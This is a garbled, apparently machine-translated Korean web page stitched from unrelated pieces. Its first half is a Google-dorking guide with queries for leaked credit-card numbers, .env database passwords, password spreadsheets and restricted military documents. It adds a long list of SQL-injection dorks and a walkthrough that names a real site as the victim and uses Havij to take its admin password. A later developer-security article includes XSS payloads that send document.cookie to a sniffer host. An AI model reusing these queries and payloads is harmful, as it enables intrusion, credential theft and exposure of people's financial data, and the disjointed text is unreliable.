Kali Linux에서 SQL 주입을 찾아 활용하기 위한 다기능 도구인 jSQL 주입 사용에 대한 지침입니다. 잘 알려지지 않은 Google 기능을 사용하여 URL 게시 미리보기 PHP ID에서 숨겨진 제품 찾기

각 연산자에는 더 짧은 이름(접두사 all 제외)의 경량 버전이 있습니다. 차이점은 allinurl은 모든 단어가 포함된 링크를 찾고, inurl은 그 중 첫 번째 단어가 포함된 링크만 찾는다는 것입니다. 검색어의 두 번째 및 후속 단어는 웹페이지 어디에나 나타날 수 있습니다. inurl 연산자는 유사한 의미를 지닌 다른 연산자인 사이트와도 다릅니다. 첫 번째 방법을 사용하면 알려진 취약점이 있는 구성 요소를 찾는 데 널리 사용되는 검색된 문서(예: /cgi-bin/)에 대한 링크에서 일련의 문자를 찾을 수 있습니다.

실제로 시도해 봅시다. 우리는 allintext 필터를 사용하여 요청이 2년 후에만 만료되는(또는 소유자가 모든 사람에게 먹이를 주는 데 지쳤을 때) 신용 카드의 번호 및 확인 코드 목록을 생성하도록 합니다.

Allintext: 카드번호 유효기간/2017 cvv

젊은 해커가 국방부나 NASA의 서버를 해킹하여 기밀 정보를 훔쳤다는 뉴스를 읽을 때 대부분의 경우 Google을 사용하는 기본 기술에 대해 이야기하고 있습니다. NASA 직원 목록과 연락처 정보에 관심이 있다고 가정해 보겠습니다. 확실히 그러한 목록은 전자 형식으로 제공됩니다. 편의를 위해 또는 감독으로 인해 해당 조직의 웹사이트 자체에 있을 수도 있습니다. 이 경우에는 내부용이므로 링크가 없다는 것이 논리적입니다. 그러한 파일에는 어떤 단어가 포함될 수 있습니까? 최소한 "주소" 필드입니다. 이러한 모든 가정을 테스트하는 것은 쉽습니다.

Inurl:nasa.gov 파일 유형:xlsx "주소"

이와 같은 발견은 좋은 터치입니다. 웹마스터를 위한 Google 운영자, 네트워크 자체 및 찾고 있는 구조의 특성에 대한 보다 자세한 지식을 통해 정말 확실한 정보를 얻을 수 있습니다. 세부 사항을 알면 결과를 쉽게 필터링하고 필요한 파일의 속성을 구체화하여 나머지 부분에서 정말 귀중한 데이터를 얻을 수 있습니다. 관료주의가 여기서 구출된다는 것이 재밌습니다. 실수로 인터넷에 유출된 비밀 정보를 검색하는 데 편리한 표준 공식을 생성합니다.

예를 들어, 미국 국방부에서 요구하는 배포 명세서 스탬프는 문서 배포에 대한 표준화된 제한을 의미합니다. 문자 A는 비밀이 없는 공개 릴리스를 나타냅니다. B - 내부 전용, C - 엄격한 기밀 등 F까지 계속됩니다. 문자 X는 별도로 눈에 띄며 최고 수준의 국가 비밀을 나타내는 특히 귀중한 정보를 표시합니다. 근무 중 이 작업을 수행해야 하는 사람들이 해당 문서를 검색하도록 하세요. 그러면 문자 C가 있는 파일로 제한하겠습니다. DoDI 지침 5230.24에 따르면 이 표시는 수출 통제 대상인 중요 기술에 대한 설명이 포함된 문서에 할당됩니다. . 미 육군에 할당된 최상위 domain.mil 사이트에서 신중하게 보호되는 정보를 찾을 수 있습니다.

"배포문 C" inurl:navy.mil

.mil 도메인에는 미국 국방부 및 그 계약 조직의 사이트만 포함되어 있어 매우 편리합니다. 도메인 제한이 있는 검색 결과는 매우 깨끗하며 제목 자체가 말해줍니다. 이런 방식으로 러시아 비밀을 검색하는 것은 사실상 쓸모가 없습니다. domains.ru 및.rf에서는 혼돈이 지배하고 많은 무기 시스템의 이름은 식물 이름 (PP "Kiparis", 자주포 "Akatsia")처럼 들리거나 심지어 멋진 ( TOS "부라티노").

.mil 도메인 사이트의 문서를 주의 깊게 조사하면 검색 범위를 좁힐 수 있는 다른 마커를 볼 수 있습니다. 예를 들어, 흥미로운 기술 정보를 검색하는 데에도 편리한 수출 제한 "Sec 2751"에 대한 참조가 있습니다. 한때 등장했던 공식 사이트에서는 삭제되는 경우가 있기 때문에 검색결과에서 흥미로운 링크를 따라갈 수 없다면 구글의 캐시(캐시 운영자)나 인터넷 아카이브 사이트를 이용해보세요.

실수로 기밀 해제된 정부 문서 외에도 공개적으로 게시된 데이터에 대한 '비공개' 링크를 생성하는 Dropbox 및 기타 데이터 저장 서비스의 개인 파일 링크가 Google 캐시에 나타나는 경우가 있습니다. 대체 서비스와 직접 만든 서비스의 경우 상황은 더욱 악화됩니다. 예를 들어 다음 쿼리는 FTP 서버가 설치되어 있고 라우터를 적극적으로 사용하는 모든 Verizon 고객에 대한 데이터를 찾습니다.

Allinurl:ftp:// verizon.net

현재 그러한 똑똑한 사람들은 4만 명이 넘고, 2015년 봄에는 그 수가 더 많아졌습니다. Verizon.net 대신 잘 알려진 제공업체의 이름으로 대체할 수 있으며, 유명할수록 더 큰 피해를 입을 수 있습니다. 내장된 FTP 서버를 통해 공유기에 연결된 외부 저장장치에 있는 파일을 볼 수 있습니다. 일반적으로 이는 원격 작업, 개인 클라우드 또는 일종의 P2P 파일 다운로드를 위한 NAS입니다. 이러한 미디어의 모든 콘텐츠는 Google 및 기타 검색 엔진에 의해 색인화되므로 직접 링크를 통해 외부 드라이브에 저장된 파일에 액세스할 수 있습니다.

클라우드로의 광범위한 마이그레이션 이전에는 단순 FTP 서버가 원격 스토리지로 사용되었으며 이 역시 취약점이 많았습니다. 그 중 다수는 오늘날에도 여전히 관련이 있습니다. 예를 들어, 널리 사용되는 WS_FTP Professional 프로그램은 ws_ftp.ini 파일에 구성 데이터, 사용자 계정 및 비밀번호를 저장합니다. 모든 기록은 텍스트 형식으로 저장되며, 비밀번호는 난독화를 최소화한 Triple DES 알고리즘으로 암호화되므로 찾기 및 읽기가 쉽습니다. 대부분의 버전에서는 첫 번째 바이트를 삭제하는 것만으로도 충분합니다.

WS_FTP 비밀번호 해독기 유틸리티나 무료 웹 서비스를 사용하면 이러한 비밀번호를 쉽게 해독할 수 있습니다.

임의의 웹사이트 해킹에 관해 이야기할 때 일반적으로 CMS 또는 전자 상거래 애플리케이션의 구성 파일 백업 및 로그에서 비밀번호를 얻는 것을 의미합니다. 일반적인 구조를 알면 키워드를 쉽게 표시할 수 있습니다. ws_ftp.ini에 있는 것과 같은 줄은 매우 일반적입니다. 예를 들어 Drupal과 PrestaShop에는 항상 사용자 식별자(UID)와 해당 비밀번호(pwd)가 있으며 모든 정보는 .inc 확장자를 가진 파일에 저장됩니다. 다음과 같이 검색할 수 있습니다.

"pwd=" "UID=" 내선:inc

SQL 서버의 구성 파일에는 사용자 이름과 이메일 주소가 일반 텍스트로 저장되고 해당 MD5 ​​해시가 비밀번호 대신 기록됩니다. 엄밀히 말하면 이를 해독하는 것은 불가능하지만 알려진 해시-비밀번호 쌍 중에서 일치하는 항목을 찾을 수 있습니다.

비밀번호 해싱조차 사용하지 않는 DBMS가 여전히 있습니다. 이들 중 하나의 구성 파일은 브라우저에서 간단히 볼 수 있습니다.

텍스트:DB_PASSWORD 파일 유형:env

Windows 서버의 출현으로 구성 파일의 위치는 레지스트리에서 부분적으로 차지했습니다. reg를 파일 유형으로 사용하여 정확히 동일한 방식으로 해당 분기를 검색할 수 있습니다. 예를 들어 다음과 같습니다.

파일 형식:reg HKEY_CURRENT_USER "비밀번호"=

때로는 실수로 공개되어 Google의 주목을 받은 데이터를 사용하여 기밀 정보에 접근하는 것이 가능합니다. 이상적인 옵션은 일반적인 형식의 비밀번호 목록을 찾는 것입니다. 절박한 사람들만이 계정 정보를 텍스트 파일, Word 문서 또는 Excel 스프레드시트에 저장할 수 있지만 항상 충분합니다.

파일 형식:xls inurl:비밀번호

한편으로는 그러한 사고를 예방할 수 있는 방법이 많이 있습니다. htaccess에 적절한 액세스 권한을 지정하고 CMS를 패치하며 왼손 스크립트를 사용하지 말고 다른 구멍을 닫아야 합니다. 검색 엔진이 지정된 파일과 디렉터리를 색인화하는 것을 금지하는 robots.txt 예외 목록이 포함된 파일도 있습니다. 반면에 일부 서버의 robots.txt 구조가 표준 서버와 다른 경우 서버에서 무엇을 숨기려고 하는지 즉시 알 수 있습니다.

모든 사이트의 디렉터리 및 파일 목록 앞에는 표준 색인이 붙습니다. 서비스 목적을 위해서는 제목에 표시되어야 하므로 검색을 제목 연산자로 제한하는 것이 합리적입니다. 흥미로운 내용은 /admin/, /personal/, /etc/ 및 심지어 /secret/ 디렉토리에 있습니다.

여기서 관련성은 매우 중요합니다. 오래된 취약점은 매우 느리게 해결되지만 Google과 Google의 검색 결과는 지속적으로 변경됩니다. "마지막 순간" 필터(요청 URL 끝에 &tbs=qdr:s)와 "실시간" 필터(&tbs=qdr:1) 사이에도 차이가 있습니다.

파일의 마지막 업데이트 날짜의 시간 간격도 Google에서 암시적으로 표시합니다. 그래픽 웹 인터페이스를 통해 표준 기간(시, 일, 주 등) 중 하나를 선택하거나 날짜 범위를 설정할 수 있지만 이 방법은 자동화에 적합하지 않습니다.

주소 표시줄의 모양을 보면 &tbs=qdr: 구성을 사용하여 결과 출력을 제한하는 방법만 추측할 수 있습니다. 1년 제한을 설정한 뒤의 문자 y(&tbs=qdr:y), m은 지난 달의 결과를 표시합니다. w - 이번 주, d - 지난 날, h - 지난 시간, n - 잠시 동안, 그리고 s - 잠시만 기다려주세요. Google이 방금 공개한 가장 최근 결과는 &tbs=qdr:1 필터를 사용하여 찾을 수 있습니다.

영리한 스크립트를 작성해야 하는 경우 날짜 범위 연산자를 사용하여 Google에서 날짜 범위가 율리우스 형식으로 설정되어 있다는 것을 아는 것이 유용할 것입니다. 예를 들어, 2015년 1월 1일부터 7월 1일까지 다운로드된 기밀 단어가 포함된 PDF 문서 목록을 찾는 방법입니다.

기밀 파일 형식:pdf 날짜 범위:2457024-2457205

범위는 분수 부분을 고려하지 않고 율리우스력 날짜 형식으로 표시됩니다. 그레고리력에서 수동으로 번역하는 것은 불편합니다. 날짜 변환기를 사용하는 것이 더 쉽습니다.

검색 쿼리에 추가 연산자를 지정하는 것 외에도 링크 본문에서 직접 보낼 수 있습니다. 예를 들어, filetype:pdf 사양은 as_filetype=pdf 구성에 해당합니다. 이렇게 하면 설명을 묻는 것이 편리해집니다. 검색 URL에 cr=countryHN 구문을 추가하여 온두라스 공화국의 결과 출력만 지정하고 Bobruisk 시(gcs=Bobruisk)에서만 결과 출력을 지정한다고 가정해 보겠습니다. 개발자 섹션에서 전체 목록을 찾을 수 있습니다.

Google의 자동화 도구는 삶을 더 쉽게 만들도록 설계되었지만 종종 문제를 추가합니다. 예를 들어, 사용자의 IP는 WHOIS를 통해 도시를 결정하는 데 사용됩니다. 이 정보를 바탕으로 Google은 서버 간의 부하 균형을 조정할 뿐만 아니라 검색 결과도 변경합니다. 지역에 따라 동일한 요청에 대해 첫 번째 페이지에 다른 결과가 나타나며 일부는 완전히 숨겨질 수 있습니다. gl=country 지시문 뒤의 두 글자 코드는 국제적인 느낌을 주고 모든 국가의 정보를 찾는 데 도움이 됩니다. 예를 들어 네덜란드의 코드는 NL인데, 바티칸과 북한은 구글에 자체 코드가 없습니다.

여러 고급 필터를 사용한 후에도 검색 결과가 복잡해지는 경우가 많습니다. 이 경우 여러 예외 단어를 추가하여 요청을 명확하게 하는 것이 쉽습니다(각 예외 단어 앞에 빼기 기호가 표시됨). 예를 들어, 뱅킹, 이름, 튜토리얼 등은 개인이라는 단어와 함께 사용되는 경우가 많습니다. 따라서 더 깔끔한 검색 결과는 교과서적인 쿼리 예시가 아닌 정제된 예시로 표시됩니다.

제목:"/개인/색인" -names -tutorial -banking

정교한 해커는 필요한 모든 것을 스스로 제공한다는 점에서 구별됩니다. 예를 들어, VPN은 편리하지만 비용이 많이 들거나 일시적이고 제한이 있습니다. 자신을 위해 구독을 신청하는 것은 비용이 너무 많이 듭니다. 그룹 구독이 있다는 점은 좋은데, Google의 도움으로 그룹에 쉽게 가입할 수 있습니다. 이렇게 하려면 표준이 아닌 PCF 확장자와 인식 가능한 경로(Program Files\Cisco Systems\VPN Client\Profiles)가 있는 Cisco VPN 구성 파일을 찾으십시오. 예를 들어, 한 번의 요청으로 본 대학교의 친절한 팀에 합류하게 됩니다.

파일 유형:pcf vpn OR 그룹

비밀번호는 암호화되어 저장되지만 Maurice Massard는 이미 비밀번호를 해독하는 프로그램을 작성하여 thecampusgeeks.com을 통해 무료로 제공하고 있습니다.

Google은 수백 가지의 다양한 유형의 공격과 침투 테스트를 실행합니다. 인기 있는 프로그램, 주요 데이터베이스 형식, PHP의 수많은 취약점, 클라우드 등에 영향을 미치는 다양한 옵션이 있습니다. 찾고 있는 것이 무엇인지 정확히 알면 필요한 정보(특히 공개할 의도가 없었던 정보)를 훨씬 쉽게 찾을 수 있습니다. Shodan은 흥미로운 아이디어를 제공하는 유일한 제품이 아니라 인덱싱된 네트워크 리소스의 모든 데이터베이스입니다!

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- 질문-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: Offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

여기에 작은 목록이 있습니다. 당신은 당신을 사용할 수 있습니다. 그래서 우리는 사이트를 찾았습니다. 예를 들어 http://www.vestitamvov.ru/
다음으로 이 프로그램을 다운로드하세요.

확인을 클릭하세요. 그런 다음 피해 사이트를 삽입합니다.
시작을 누릅니다. 다음으로 결과를 기다립니다.
그래서 프로그램은 SQL 취약점을 발견했습니다.

다음으로 Havij를 다운로드하고 http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= 받은 링크를 거기에 붙여넣으세요. Havij 사용 방법과 다운로드 위치는 별도로 설명하지 않겠습니다. 모두. 필요한 데이터(관리자 비밀번호)를 받았는데, 그 다음은 여러분의 상상에 달려 있습니다.

추신 이것은 제가 처음으로 글을 쓰려는 시도입니다. 뭔가 문제가 있다면 죄송합니다

나는 정보 보안에 대해 조금 이야기하기로 결정했습니다. 이 기사는 초보 프로그래머와 이제 막 프론트엔드 개발에 참여하기 시작한 사람들에게 유용할 것입니다. 문제는 무엇입니까?

많은 초보 개발자는 코드 작성에 너무 열중하여 작업 보안을 완전히 잊어버립니다. 그리고 가장 중요한 것은 SQL 및 XXS 쿼리와 같은 취약점을 잊어버린다는 것입니다. 그들은 또한 관리 패널에 대한 쉬운 비밀번호를 제시하고 무차별 대입 공격을 받습니다. 이러한 공격은 무엇이며 어떻게 피할 수 있습니까?

SQL 주입은 특정 DBMS에 대한 SQL 쿼리 중에 수행되는 데이터베이스에 대한 가장 일반적인 공격 유형입니다. 많은 사람들과 심지어 대기업도 이러한 공격으로 고통받고 있습니다. 그 이유는 데이터베이스 및 엄밀히 말하면 SQL 쿼리를 작성할 때 개발자 오류 때문입니다.

SQL 쿼리에 사용된 입력 데이터의 잘못된 처리로 인해 SQL 주입 공격이 가능합니다. 해커의 공격이 성공하면 데이터베이스 내용뿐만 아니라 비밀번호 및 관리 패널 로그도 손실될 위험이 있습니다. 그리고 이 데이터는 사이트를 완전히 장악하거나 사이트를 되돌릴 수 없게 조정하는 데 충분합니다.

공격은 PHP, ASP, Perl 및 기타 언어로 작성된 스크립트에서 성공적으로 재현될 수 있습니다. 이러한 공격의 성공 여부는 어떤 DBMS가 사용되는지, 스크립트 자체가 어떻게 구현되는지에 따라 달라집니다. 전 세계에는 SQL 인젝션에 취약한 사이트가 많이 있습니다. 이는 확인하기 쉽습니다. "dorks"만 입력하세요. 이는 취약한 사이트를 검색하기 위한 특수 쿼리입니다. 그 중 일부는 다음과 같습니다.

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:페이지ID=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

어떻게 사용하나요? Google 또는 Yandex 검색 엔진에 입력하기만 하면 됩니다. 검색 엔진은 취약한 사이트뿐만 아니라 이 취약성에 대한 페이지도 제공합니다. 하지만 우리는 거기서 멈추지 않고 페이지가 실제로 취약한지 확인합니다. 이렇게 하려면 값 "id=1" 뒤에 작은따옴표 "'를 넣는 것으로 충분합니다. 이 같은:

• inurl:games.php?id=1'

그리고 사이트는 SQL 쿼리에 대한 오류를 제공합니다. 해커에게 다음으로 필요한 것은 무엇입니까?

그런 다음 그는 오류 페이지에 대한 바로 이 링크가 필요합니다. 그런 다음 대부분의 경우 취약점에 대한 작업은 주입 코드 도입 및 필요한 작업 수행과 같은 이 부분에 대한 유틸리티를 사용하여 "Kali linux" 배포판에서 수행됩니다. 어떻게 이런 일이 일어날지는 말씀드릴 수 없습니다. 그러나 이에 대한 정보는 인터넷에서 찾을 수 있습니다.

이러한 유형의 공격은 쿠키 파일에 대해 수행됩니다. 사용자는 이를 저장하는 것을 좋아합니다. 왜 안 돼? 그들 없이 우리는 무엇을 할 것인가? 결국 쿠키 덕분에 Vk.com이나 Mail.ru의 비밀번호를 백 번 입력할 필요가 없습니다. 그리고 그것을 거부하는 사람은 거의 없습니다. 그러나 인터넷에서는 해커에게 규칙이 자주 나타납니다. 편의성 계수는 ​​불안 계수에 정비례합니다.

XSS 공격을 구현하려면 해커가 JavaScript에 대한 지식이 필요합니다. 언뜻 보기에 이 언어는 컴퓨터 리소스에 접근할 수 없기 때문에 매우 단순하고 무해합니다. 해커는 브라우저에서 JavaScript로만 작업할 수 있지만 그것으로 충분합니다. 결국 가장 중요한 것은 웹페이지에 코드를 입력하는 것입니다.

공격 과정에 대해서는 자세히 이야기하지 않겠습니다. 어떻게 이런 일이 일어나는지에 대한 기본과 의미만 말씀드리겠습니다.

해커는 일부 포럼이나 방명록에 JS 코드를 추가할 수 있습니다.

document.location.href =”http://192.168.1.7/sniff.php?test”

스크립트는 코드가 실행될 감염된 페이지로 우리를 리디렉션합니다. 스니퍼, 일종의 저장소 또는 어떻게든 캐시에서 쿠키를 훔치는 익스플로잇 등이 있습니다.

왜 자바스크립트인가? JavaScript는 웹 요청을 처리하는 데 능숙하고 쿠키에 액세스할 수 있기 때문입니다. 그러나 스크립트가 우리를 어떤 사이트로 이동시킨다면 사용자는 이를 쉽게 알아차릴 것입니다. 여기서 해커는 더 교활한 옵션을 사용합니다. 그는 단순히 그림에 코드를 입력합니다.

Img=새 이미지();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

간단히 이미지를 생성하고 스크립트에 주소를 할당하면 됩니다.

이 모든 것으로부터 자신을 보호하는 방법은 무엇입니까? 매우 간단합니다. 의심스러운 링크를 클릭하지 마세요.

DoS(영어 서비스 거부에서 유래) - 서비스 거부)는 컴퓨터 시스템에 장애를 일으킬 목적으로 컴퓨터 시스템을 공격하는 해커의 공격입니다. 이는 선의의 시스템 사용자가 제공된 시스템 리소스(서버)에 액세스할 수 없거나 액세스가 어려운 조건을 만드는 것입니다. 긴급 상황에서 소프트웨어가 중요한 정보(예: 버전, 프로그램 코드의 일부 등)를 생성하는 경우 시스템 오류는 시스템 인수를 향한 단계일 수도 있습니다. 그러나 대부분의 경우 이는 경제적 압박의 척도입니다. 소득을 창출하는 간단한 서비스의 손실. 공급자의 청구서 또는 공격을 피하기 위한 조치는 주머니 속의 "표적"에 큰 타격을 입혔습니다. 현재 DoS 및 DDoS 공격은 법적으로 중요한 증거를 남기지 않고 거의 모든 시스템에 장애를 발생시킬 수 있기 때문에 가장 널리 사용됩니다.

DoS와 DDos 공격의 차이점은 무엇입니까?

DoS는 교묘하게 설계된 공격입니다. 예를 들어, 서버가 들어오는 패킷의 정확성을 확인하지 않으면 해커가 요청을 처리하는 데 시간이 오래 걸릴 수 있으며 다른 연결을 처리하는 데 프로세서 시간이 충분하지 않게 됩니다. 이에 따라 고객 서비스가 거부됩니다. 그러나 이런 방식으로 잘 알려진 대형 사이트를 과부하하거나 비활성화하는 것은 불가능합니다. 이러한 과부하에도 문제 없이 대처할 수 있는 상당히 넓은 채널과 초강력 서버로 무장하고 있습니다.

DDoS는 실제로 DoS와 동일한 공격입니다. 그러나 DoS에 하나의 요청 패킷이 있는 경우 DDoS에는 수백 개 이상이 있을 수 있습니다. 아무리 강력한 서버라도 이러한 과부하에 대처하지 못할 수도 있습니다. 예를 들어 보겠습니다.

DoS 공격은 누군가와 대화를 나누고 있는데 예의가 없는 사람이 다가와 큰 소리로 소리를 지르는 것을 말합니다. 말하기가 불가능하거나 매우 어렵습니다. 해결 방법: 보안요원에게 연락해 진정시키고 해당 사람을 현장에서 쫓아내십시오. DDoS 공격은 수천 명의 무례한 사람들이 몰려드는 것입니다. 이 경우 보안요원은 모든 사람을 묶어서 데려갈 수 없습니다.

DoS와 DDoS는 소위 좀비라고 불리는 컴퓨터에서 수행됩니다. 이들은 자신의 컴퓨터가 서버에 대한 공격에 참여하고 있다고 의심하지 않는 해커에 의해 해킹된 사용자의 컴퓨터입니다.

이것으로부터 자신을 보호하는 방법은 무엇입니까? 일반적으로 절대 그렇지 않습니다. 하지만 해커에게는 상황이 더 어려워질 수 있습니다. 이렇게 하려면 강력한 서버를 갖춘 좋은 호스팅을 선택해야 합니다.

개발자는 다양한 공격 방지 시스템을 마련하고, 우리가 작성한 스크립트를 완전히 검토하고, 사이트에서 취약점을 확인하는 등의 작업을 할 수 있습니다. 그러나 웹사이트 레이아웃의 마지막 단계, 즉 단순히 관리자 패널의 비밀번호를 설정할 때 한 가지를 잊어버릴 수 있습니다. 비밀번호!

간단한 비밀번호를 설정하는 것은 엄격히 권장되지 않습니다. 12345, 1114457, vasya111 등이 될 수 있습니다. 길이가 10-11자 미만인 비밀번호를 설정하지 않는 것이 좋습니다. 그렇지 않으면 가장 일반적이고 복잡하지 않은 공격인 무차별 대입 공격을 받을 수 있습니다.

무차별 대입(Brute force)은 특수 프로그램을 이용한 사전 비밀번호 검색 공격이다. 사전은 다를 수 있습니다. 라틴어, 숫자로 열거(예: 특정 범위까지), 혼합(라틴어 + 숫자), 고유 문자가 포함된 사전도 있습니다 @#4$%&*~~`'”\ ? 등.

물론, 이러한 유형의 공격은 피하기 쉽습니다. 복잡한 비밀번호만 알아내면 됩니다. 보안 문자라도 당신을 구할 수 있습니다. 또한 귀하의 사이트가 CMS에서 만들어진 경우 많은 사이트에서 이러한 유형의 공격을 감지하고 IP를 차단합니다. 비밀번호에 문자가 많을수록 추측하기가 더 어렵다는 점을 항상 기억해야 합니다.

해커는 어떻게 작동하나요? 대부분의 경우 사전에 비밀번호의 일부를 의심하거나 알고 있습니다. 사용자의 비밀번호가 확실히 3~5자로 구성되지 않을 것이라고 가정하는 것은 매우 논리적입니다. 이러한 비밀번호는 빈번한 해킹으로 이어집니다. 기본적으로 해커는 5~10자의 범위를 취하고, 미리 알 수 있는 여러 문자를 추가합니다. 다음으로 필요한 범위의 비밀번호가 생성됩니다. Kali Linux 배포판에는 이러한 경우를 위한 프로그램도 있습니다. 그리고 짜잔, 사전의 양이 더 이상 그렇게 크지 않기 때문에 공격은 더 이상 오래 지속되지 않습니다. 게다가 해커는 비디오 카드의 힘을 이용할 수도 있다. 그 중 일부는 CUDA 시스템을 지원해 검색 속도가 10배나 빨라진다. 이제 우리는 이렇게 간단한 공격이 실제로 가능하다는 것을 알 수 있습니다. 그러나 무차별 공격의 대상이 되는 것은 웹사이트만이 아닙니다.

친애하는 개발자 여러분, 정보 보안 시스템을 잊지 마세요. 오늘날 국가를 포함한 많은 사람들이 이러한 유형의 공격으로 고통 받고 있기 때문입니다. 결국, 가장 큰 취약성은 항상 어딘가에 주의가 산만해지거나 무언가를 놓칠 수 있는 사람입니다. 우리는 프로그래머이지만 프로그래밍된 기계는 아닙니다. 정보를 잃으면 심각한 결과를 초래할 수 있으므로 항상 경계하십시오!